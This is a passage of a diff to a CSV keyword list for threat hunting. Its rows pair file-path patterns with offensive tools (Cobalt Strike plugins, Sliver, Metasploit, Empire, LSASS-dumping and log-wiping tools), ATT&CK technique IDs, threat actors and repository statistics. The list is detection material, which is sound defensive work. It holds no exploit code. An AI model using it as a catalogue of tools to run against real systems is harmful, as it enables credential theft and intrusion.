TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","0","N/A","N/A","3","263","24","2023-07-27T15:15:32Z","2023-01-06T15:43:27Z" @@ -3503,7 +3516,7 @@ "*/Erebus/*.dll*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*/Erebus/*.exe*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*/Erebus-email.*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" -"*/etc/passwd*/.sudo_as_admin_successful*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*/etc/passwd*/.sudo_as_admin_successful*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" "*/EternalHushCore.dll*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" "*/EternalHushFramework.git*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" "*/etumbot.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" @@ -3513,10 +3526,10 @@ "*/etw-fuck.cpp*","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","1","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*/etw-fuck.exe*","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","1","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*/ETWHash/*","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","3","229","27","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z" -"*/evasion/evasion.go","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*/evasion/windows/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/evasion_linux.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*/evasion_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*/evasion/evasion.go","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/evasion/windows/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/evasion_linux.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/evasion_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*/EventViewerUAC/*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","104","33","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" "*/EventViewerUAC/*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/EventViewerUAC_BOF","1","1","N/A","10","10","130","29","2022-05-06T17:43:05Z","2022-05-02T02:08:52Z" "*/EventViewer-UACBypass*","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","1","N/A","10","2","108","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" @@ -3526,18 +3539,18 @@ "*/EvilClippy*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*/evilclippy.cs*","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","1956","381","2022-05-19T23:00:22Z","2019-03-26T12:14:03Z" "*/EvilClippy.git*","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","1956","381","2022-05-19T23:00:22Z","2019-03-26T12:14:03Z" -"*/evilginx*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1308","237","2023-09-13T23:44:48Z","2022-09-07T02:47:43Z" -"*/evilhost:*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-JBoss.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*/EvilLsassTwin/*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","1","39","3","2023-09-11T14:03:21Z","2022-09-13T12:42:13Z" -"*/EvilnoVNC.git*","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","1","N/A","9","7","662","118","2023-09-25T10:50:52Z","2022-09-04T10:48:49Z" +"*/evilginx*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1308","237","2023-10-04T15:18:07Z","2022-09-07T02:47:43Z" +"*/evilhost:*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-JBoss.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/EvilLsassTwin/*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","1","39","3","2023-10-04T21:33:57Z","2022-09-13T12:42:13Z" +"*/EvilnoVNC.git*","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","1","N/A","9","7","662","118","2023-10-04T15:20:08Z","2022-09-04T10:48:49Z" "*/evilqr.git*","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","2","152","21","2023-07-05T13:24:44Z","2023-06-20T12:58:09Z" "*/evilSignatures.db*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" -"*/EvilTwinServer*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","1","39","3","2023-09-11T14:03:21Z","2022-09-13T12:42:13Z" +"*/EvilTwinServer*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","1","39","3","2023-10-04T21:33:57Z","2022-09-13T12:42:13Z" "*/EvtMute.git*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" -"*/Example_C2_Profile*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*/Example_Payload_Type/*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" +"*/Example_C2_Profile*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*/Example_Payload_Type/*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" "*/ExcelDocWriter.cs*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" -"*/exchanger.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/exchanger.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*/exe_to_dll.git*","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","5","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" "*/exe_to_dll.git*","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/hasherezade/exe_to_dll","1","1","N/A","8","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" "*/exe2powershell*","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense 